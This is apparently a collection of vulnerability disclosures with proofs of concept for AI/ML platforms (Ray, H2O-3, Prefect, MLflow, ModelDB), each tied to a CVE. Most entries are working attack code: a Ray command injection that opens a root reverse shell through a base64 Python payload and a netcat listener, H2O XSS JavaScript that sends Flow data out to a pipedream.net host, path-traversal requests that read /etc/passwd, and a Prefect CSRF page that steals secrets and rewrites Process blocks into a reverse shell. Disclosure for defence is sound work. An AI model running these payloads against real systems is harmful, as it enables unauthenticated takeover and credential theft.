A command injection exists in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.

**Description**

The Ray Project dashboard contains a CPU profiling page, and the format parameter is not validated before being inserted into a system command executed in a shell, allowing for arbitrary command execution. If the system is configured to allow passwordless sudo (a setup some Ray configurations require) this will result in a root shell being returned to the user. If not configured, a user level shell will be returned:

**Proof of Concept**

For this proof of concept, the attacker machine is 192.168.200.177 and the victim Ray dashboard is 192.168.200.204.

****Victim Ray dashboard ray_dashboard.py (192.168.200.204)****

    #!/usr/bin/env python3
    import ray
    context = ray.init(dashboard_host="0.0.0.0")
    print(context.dashboard_url)
    

and run like so:

    python3 -i ray_dashboard.py
    

****Attacker machine (192.168.200.177)****

    user@attacker:~$ nc -lvvp 4444 &
    Listening on 0.0.0.0 4444
    # python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.200.177",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])' == cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguMjAwLjE3NyIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSkn
    user@attacker:~$ curl 'http://192.168.200.204:8265/worker/cpu_profile?pid=3354&ip=192.168.200.204&duration=5&native=0&format=`echo%20cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguMjAwLjE3NyIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSkn|base64$IFS-d|sudo%20sh`'
    Connection received on 192.168.200.204 57436
    # id
    uid=0(root) gid=0(root) groups=0(root)
    # whoami
    root
    # hostname
    ray
    

**Impact**

Exploiting this vulnerability allows for a complete remote compromise of the system running the Ray dashboard, including model theft & alteration, total data compromise, and persistent access to an attacker. Ray has specific setup cases for setup with a passwordless sudo, giving the attacker root access. If Ray is not configured for passwordless sudo, the attacker will receive access in the same account the dashboard was run. Both allow for model model theft & alteration, total data compromise, and persistent access to an attacker.

**Occurrences**

profile\_manager.py L86-L114

This is the vulnerable function containing the unverified format parameter. Allow-listing this to a boolean, known good values, or a highly filtered string type will fix this vulnerability

CVE-2023-6019: Code injection in cpu_profile format parameter in ray

H2O included a reference to an S3 bucket that no longer existed allowing an attacker to take over the S3 bucket URL.

**Description**

During a source code review of the provided script, it has been identified that the code contains the "h20-r" S3 bucket, which was previously unclaimed and taken over for proof-of-concept (PoC) purposes. This unauthorized takeover introduces security risks including unauthorized access and potential content modification.

**Steps To Reproduce:**

1.  Create a s3 bucket with name h20-r and us east 1 region
2.  Upload files with the name same as given in the code (e.g. LiblineaR\_1.94-2.tar.gz)
3.  Make the settings and change it as a static website
4.  You have successfully taken the s3 bucket and now when any user runs the code the url with s3 get executed and an attacker can spread dangerous malware.

**Proof of Concept**

1.  POC Link for the s3 bucket takeover :- https://h2o-r.s3.amazonaws.com/index.html
2.  Github link that shows the s3 bucket :- https://github.com/h2oai/h2o-3/blob/918af06003ef8e56db51669401fc0e7dad046f99/docker/setup-h2o-dev.sh#L51

**Impact**

The unauthorized takeover of the "h20-r" S3 bucket introduces the following potential impacts:

Unauthorized Access: The unauthorized modification of the S3 bucket allows unauthorized individuals to access the bucket's contents, potentially leading to data leakage or unauthorized usage.

Content Modification: Since the bucket's content has been changed, any code, files, or data retrieved from the bucket may be malicious or untrustworthy. This could lead to unintended code execution on systems that rely on the content from this bucket.

Supply Chain Attack: By altering the original content in the S3 bucket, an attacker could perform a supply chain attack. Users executing the script may unknowingly install malicious or compromised versions of packages, introducing security vulnerabilities.

**Occurrences**

CVE-2023-6017: Unauthorized Access and Content Modification in h20-r S3 Bucket which is used in .sh and docker file leads to spread of malicious R package which can lead to remote code execution in h2o-3

H2O is vulnerable to stored XSS vulnerability which can lead to a Local File Include attack.

**Description**

In h2o-3, the data of all open Flows can be leaked or tampered with through Stored XSS vulnerability, and information can be modified or read in the model.

**Proof of Concept**

    hijack = (data) => {
        window.open(`https://b89f8f617e7792dc04cbdf2efbd5e0c9.m.pipedream.net/?data=${data}`)
    }
    flows_data = '';
    flows_name = [];
    fetch('http://localhost:54321/3/NodePersistentStorage/notebook')
        .then((x) => x.text())
        .then((x) => flows_data = JSON.parse(x))
        .then(() => {
            for(i = 0; i < flows_data['entries'].length; i++){
                flows_name.push(flows_data['entries'][i]['name'])
            }
        })
        .then(() => {
            for(i = 0; i < flows_name.length; i++){
                fetch(`http://localhost:54321/3/NodePersistentStorage/notebook/${flows_name[i]}`)
                    .then((x) => x.text())
                    .then((x) => hijack(x))
            }
        })
    
    // aGlqYWNrID0gKGRhdGEpID0+IHsKICAgIHdpbmRvdy5vcGVuKGBodHRwczovL2I4OWY4ZjYxN2U3NzkyZGMwNGNiZGYyZWZiZDVlMGM5Lm0ucGlwZWRyZWFtLm5ldC8/ZGF0YT0ke2RhdGF9YCkKfQpmbG93c19kYXRhID0gJyc7CmZsb3dzX25hbWUgPSBbXTsKZmV0Y2goJ2h0dHA6Ly9sb2NhbGhvc3Q6NTQzMjEvMy9Ob2RlUGVyc2lzdGVudFN0b3JhZ2Uvbm90ZWJvb2snKQogICAgLnRoZW4oKHgpID0+IHgudGV4dCgpKQogICAgLnRoZW4oKHgpID0+IGZsb3dzX2RhdGEgPSBKU09OLnBhcnNlKHgpKQogICAgLnRoZW4oKCkgPT4gewogICAgICAgIGZvcihpID0gMDsgaSA8IGZsb3dzX2RhdGFbJ2VudHJpZXMnXS5sZW5ndGg7IGkrKyl7CiAgICAgICAgICAgIGZsb3dzX25hbWUucHVzaChmbG93c19kYXRhWydlbnRyaWVzJ11baV1bJ25hbWUnXSkKICAgICAgICB9CiAgICB9KQogICAgLnRoZW4oKCkgPT4gewogICAgICAgIGZvcihpID0gMDsgaSA8IGZsb3dzX25hbWUubGVuZ3RoOyBpKyspewogICAgICAgICAgICBmZXRjaChgaHR0cDovL2xvY2FsaG9zdDo1NDMyMS8zL05vZGVQZXJzaXN0ZW50U3RvcmFnZS9ub3RlYm9vay8ke2Zsb3dzX25hbWVbaV19YCkKICAgICAgICAgICAgICAgIC50aGVuKCh4KSA9PiB4LnRleHQoKSkKICAgICAgICAgICAgICAgIC50aGVuKCh4KSA9PiBoaWphY2soeCkpCiAgICAgICAgfQogICAgfSk=
    

The payload leaking data from all Flows is as above. To use it without any error, you need to base64 encode it.

**How to build**

    # Build H2O
    git clone https://github.com/h2oai/h2o-3.git
    cd h2o-3
    ./gradlew build -x test
    
    You may encounter problems: e.g. npm missing. Install it:
    brew install npm
    
    # Start H2O
    java -jar build/h2o.jar
    
    # Point browser to http://localhost:54321
    

**Step to Reproduce**

1.  Go to http://localhost:54321/flow/index.html
2.  Open the same file : Sample Data.flow
3.  Open the poc file : leak_poc.flow
4.  Click the play button on flows of leak\_poc

**Poc File**

https://drive.google.com/drive/folders/1yINoutLUbj2-kpJHsqiGPxz7jkpBI4MX?usp=sharing

All PoCs and videos can be found on Google Drive above.

**Impact**

All data in this service can be tampered with or leaked without user's permission.

**Occurrences**

CVE-2023-6013: Leaking/modulation Flows/Model data via stored xss in h2o-3

LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.

**Description**

Attackers can read any file on the system with the permissions of the user that started the Ray Dashboard.

**Proof of Concept**

    GET /api/v0/logs/file?node_id=56424ecdb00cf570f0831aa698dd7c44e527a20212d2fa27078c7f79&filename=../../../../../etc%2fpasswd&lines=50000 HTTP/1.1
    Host: localhost:8265
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost:8265/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    HTTP/1.1 200 OK
    Content-Type: text/plain
    Date: Thu, 24 Aug 2023 21:49:54 GMT
    Server: Python/3.8 aiohttp/3.8.5
    Connection: close
    Content-Length: 8225
    
    1##
    # User Database
    # 
    # Note that this file is consulted directly only when the system is running
    # in single-user mode.  At other times this information is provided by
    # Open Directory.
    #
    # See the opendirectoryd(8) man page for additional information about
    # Open Directory.
    ##
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
    _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
    

**Impact**

Allows attackers to remotely read any file on the system depending on the permissions of the user that started Ray.

**Occurrences**

CVE-2023-6021: LFI in Ray API in ray

An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.

**Description**

Local file include in h2o-3 REST API. Unauthenticated, remote, no user interaction, default installation.

**Proof of Concept**

Start the h2o-3 API with:

    cd h2o-3.40.0.4
    java -jar h2o.jar
    

Then make these curl requests:

    curl -i -s -k -X $'GET' \
        -H $'Host: 127.0.0.1:54321' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' -H $'Referer: http://127.0.0.1:54321/flow/index.html' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
        $'http://127.0.0.1:54321/3/ImportFiles?path=%2Fetc%2Fpasswd'
    

    curl -i -s -k -X $'POST' \
        -H $'Host: 127.0.0.1:54321' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 50' -H $'Origin: http://127.0.0.1:54321' -H $'Connection: close' -H $'Referer: http://127.0.0.1:54321/flow/index.html' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
        --data-binary $'source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D' \
        $'http://127.0.0.1:54321/3/ParseSetup'
    

The response:

    HTTP/1.1 200 OK
    Connection: close
    Date: Thu, 08 Jun 2023 15:10:27 GMT
    Cache-Control: no-cache
    X-h2o-build-project-version: 3.40.0.4
    X-h2o-rest-api-version-max: 3
    X-h2o-cluster-id: 1686167537026
    X-h2o-cluster-good: true
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' 'unsafe-eval' 'unsafe-inline'; img-src 'self' data:
    Content-Type: application/json
    Content-Length: 1457
    
    {"__meta":{"schema_version":3,"schema_name":"ParseSetupV3","schema_type":"ParseSetup"},"_exclude_fields":"","source_frames":[{"__meta":{"schema_version":3,"schema_name":"FrameKeyV3","schema_type":"Key<Frame>"},"name":"nfs://etc/passwd","type":"Key<Frame>","URL":"/3/Frames/nfs://etc/passwd"}],"parse_type":"CSV","separator":32,"single_quotes":false,"check_header":-1,"column_names":null,"skipped_columns":null,"column_types":["String","Enum"],"na_strings":null,"column_name_filter":null,"column_offset":0,"column_count":0,"destination_frame":"passwd.hex","header_lines":0,"number_columns":2,"data":[["nobody:*:-2:-2:Unprivileged","User:/var/empty:/usr/bin/false"],["root:*:0:0:System","Administrator:/var/root:/bin/sh"],["daemon:*:1:1:System","Services:/var/root:/usr/bin/false"],["fakeuser:*:99:99:Fake","User:/Users/danmcinerney/fakeuser:/bin/sh"],["_uucp:*:4:4:Unix","to","Unix","Copy","Protocol:/var/spool/uucp:/usr/sbin/uucico"],["_taskgated:*:13:13:Task","Gate","Daemon:/var/empty:/usr/bin/false"],["_networkd:*:24:24:Network","Services:/var/networkd:/usr/bin/false"],["_installassistant:*:25:25:Install","Assistant:/var/empty:/usr/bin/false"],["_lp:*:26:26:Printing","Services:/var/spool/cups:/usr/bin/false"],["_postfix:*:27:27:Postfix","Mail","Server:/var/spool/postfix:/usr/bin/false"]],"warnings":null,"chunk_size":4194304,"total_filtered_column_count":2,"custom_non_data_line_markers":null,"decrypt_tool":null,"partition_by":null,"escapechar":0}
    

Developers have been contacted 06/08/2023:

    H2O Support
        
    Wed, Jun 7, 4:32 PM (18 hours ago)
        
    to me
    
    Dear Dan McInerney,
    
    We would like to acknowledge that we have received your request for support and a ticket has been created. A support representative will be reviewing your request and will send you a personal response.
    Your ticket id is :  [#105551] 
    
    
    To view the status of the ticket or add comments, please visit
    https://support.h2o.ai/helpdesk/tickets/105551
    
    Your problem description is as below:
    
    The h2o-3 API has an LFI. You can read any file on the filesystem with import and parse commands. By default the API initializes without authentication and is remotely accessible to anyone on the local network, or the world at large if the user publicly exposed the endpoint.
    
    
    
    
    
    Ticket attachments : 1. lfi id rsa.png
    2. Screenshot 2023-06-07 at 4.31.34 PM.png
    
    
    Thank you for your patience.
    
    Sincerely,
    H2O.ai Support Team
    

**Impact**

Remotely accessing every file on the API server with the permissions of the user who ran the command.

**Occurrences**

CVE-2023-6038: LFI in h2o-3 API in h2o-3

An attacker is able to steal secrets and potentially gain remote code execution via CSRF using the Prefect API.

**Description**

If you are running the dashboard locally there is no csrf/cors/no auth and therefore you are vulnerable to cross site request forgeries. Worse yet, the service is almost certainly at 127.0.0.1:4200, reducing any need for recon or brute force. CSRF/cors/lack of auth is also likely to be a issue on self hosted instances based on the lack of documentation about how to configure auth to function similar to the cloud version.

**Proof of Concept**

    <!doctype html>
    
    <html lang="en">
    
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Prefect cross site request POC</title>
        <meta name="author" content="Joshua Bonnett">
        <meta property="og:title" content="Prefect cross site request POC">
        <meta property="og:description" content="A simple poc for prefect block data extraction ">
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.0/jquery.min.js"></script>
    </head>
    
    <body>
        <hr />
        <h1> Stolen Block content:</h1>
        <div class="block_content"> </div>
        <h1> Stolen Artifact content:</h1>
        <hr />
        <div class="artifacts"> </div>
        <hr />
        <h1> Stolen variable content:</h1>
        <hr />
        <div class="vars"> </div>
        <hr />
        <h1> Notes:</h1>
        Note that this wasn't sent anywhere, but it easily could have been sent with a second post to a server of my
        choosing, and it need not be on its own page, it could be in a ad, 10 iframes deep on a common watering hole site.
    
        Recommendation: actually enforce csrf header requirements, get rid of the "include_secrets" api flag.
        <script>
    
            fetch("http://127.0.0.1:4200/api/block_documents/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "{\"include_secrets\":true}",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.block_content').html(y));
    
            fetch("http://127.0.0.1:4200/api/artifacts/latest/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.artifacts').html(y));
            fetch("  http://127.0.0.1:4200/api/variables/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.vars').html(y));
    
            //***** Find process blocks and change them****//
            fetch("http://127.0.0.1:4200/api/block_documents/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "{\"include_secrets\":true}",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.json()).then(function (data) {
                data.forEach(element => {
                    if (element.block_type.name == "Process") {
                        fetch("http://127.0.0.1:4200/api/block_documents/" + element.id, {
                            "headers": {
                                "accept": "application/json, text/plain, */*",
                                "accept-language": "en-US,en;q=0.9",
                                "cache-control": "no-cache",
                                "content-type": "application/json",
                                "pragma": "no-cache",
                                "sec-ch-ua-mobile": "?0",
                                "sec-ch-ua-platform": "\"Linux\"",
                                "sec-fetch-dest": "empty",
                                "sec-fetch-mode": "cors",
                                "sec-fetch-site": "same-origin",
                                "sec-gpc": "1",
                                "x-prefect-ui": "true"
                            },
                            "referrer": "http://127.0.0.1:4200/blocks/block/e3129574-2094-4411-a685-5c327a0201df/edit",
                            "body": "{\"data\":{\"command\":[\"python\", \"-c\", \"import base64,sys;exec(base64.b64decode(sys.argv[1]))\", \"aW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMTI3LjAuMC4xIiw5MDAxKSk7W29zLmR1cDIocy5maWxlbm8oKSxmKWZvciBmIGluKDAsMSwyKV07cHR5LnNwYXduKCJzaCIp\"], \"stream_output\":true}, \"merge_existing_data\":false}",
                            "method": "PATCH"
                        });
                    }
                });
            });
        </script>
    </body>
    
    </html>
    

**Impact**

Stealing or changing secrets from blocks(example: aws creds, azur cred blocks) Stealing or changing variables inputs from blocks/variables(example: remote file block,) Stealing any output data from artifacts(Example: output from ml runs)

Reverse shell is possible by changing any existing Process blocks to a reverse shell (set to localhost port 9001 in the Poc, but I could have it connect back over the internet), triggers when a flow that uses that block runs. I could add code to trigger a quick run on all flows to ensure connect back shell happens immediately but I leave that to the reader.

A very similar effect could happen within the docker container, Azure Container Instance Job, ECS Task, GCP Cloud Run Job and Kubernetes Job blocks if they are configured. I didn't include them in the poc because of the complexity of setting them up in my dev env, but adapting the poc to each of these block types would be very simple.

I would recommend moving the configuration of those block types into flow code where it isnt updateable from the web, and it can be managed like code.

**Occurrences**

server.py L560

It is worth setting some limits in cors by default, it is a shame to have the middleware but have it wide open.

block\_documents.py L80

Letting the api read block secrets just by asking for them with no extra auth really isn't ideal. Server should enforce visibility rather than leaving it to the request

block\_documents.py L52

Letting the api read block secrets just by asking for them with no extra auth really isn't ideal. Server should enforce visibility rather than leaving it to the request

CVE-2023-6022: Can use csrf to steal/modify block content, artifact content, variables possibly leading to RCE when the dashboard is running on a developers workstation in prefect

MLflow allowed arbitrary files to be PUT onto the server.

CVE-2023-6015

An attacker is able to gain remote code execution on a server hosting the H2O dashboard through it's POJO model import feature.

CVE-2023-6016

An attacker can overwrite any file on the server hosting MLflow without any authentication.

CVE-2023-6018

An attacker can read any file on the filesystem on the server hosting ModelDB through an LFI in the artifact_path URL parameter.

Source

CVE